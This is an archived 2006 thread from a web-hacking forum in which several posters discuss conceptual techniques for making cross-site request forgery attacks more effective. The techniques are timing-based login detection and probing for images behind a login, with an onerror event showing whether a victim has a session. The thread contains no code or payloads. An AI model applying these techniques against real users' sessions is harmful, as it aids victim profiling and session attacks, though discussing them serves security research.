Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
More effective CSRFs!
Posted by: kishord
Date: December 05, 2006 11:18AM

Identifying if your victim is logged in is easy:

Here is the article

http://wasjournal.blogspot.com/2006/12/use-of-time-delay-technique-for.html

Options: ReplyQuote
Re: More effective CSRFs!
Posted by: rsnake
Date: December 05, 2006 11:41AM

I've looked into things like that before too. One of the most useful one is images that are protected behind the login. If you get an onerror, poof, they aren't logged in. That only works on certain websites, but it does work.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: More effective CSRFs!
Posted by: maluc
Date: December 05, 2006 04:34PM

Time delay is a very exciting idea, especially against encryption and embedded systems.. but network time is much too inprecise for my liking :T

i probably wouldn't code any exploit and certainly not worm, that relied on that timing test.. maybe in a bind

-maluc

Options: ReplyQuote
Re: More effective CSRFs!
Posted by: rsnake
Date: December 05, 2006 05:01PM

Maybe you can baseline it and have it check some other known timing values on the web and see how long it takes them to return. Averaging timing delays you can get a pretty concrete example of what their bandwidth and network lag looks like.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.